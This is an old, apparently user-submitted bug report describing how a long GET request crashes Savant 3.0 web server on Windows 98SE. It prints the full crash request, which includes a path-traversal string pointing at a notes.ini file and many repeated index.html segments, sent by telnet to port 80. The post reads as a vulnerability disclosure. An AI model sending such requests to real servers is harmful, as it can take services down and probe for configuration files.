#46 Savant Web Server Crash On Buffer Overflow

[Anonymous]

When Savant web server is issued a standard get /
command with large arguments containing repetative
index.html requests it causes an error in its own modle.

This could be a major problem and could compramise
system secuirty if your site is hosted by Savant Web
Server.

This exploit was tested on a Windows 98SE operating
system with Savant 3.0

Below is an example of a simple get / command which,
when issued to Savant, causes it to crash.

"GET /%20%
00.nsf/../lotus/domino/notes.ini/index.html/index.html/ind
ex.html/index.html/index.html/index.html/index.html/inde
x.html/index.html/index.html/index.html/index.html/index.
html/index.html/index.html/index.html/index.html/index.h
tml/index.html/index.html"

I issued this through the standard windows telnet after
connecting to the host running Savant on port 80.

But, besides this small problem, Savant is a great
freeware tool which has helped me greatly!

Thanks - Thunder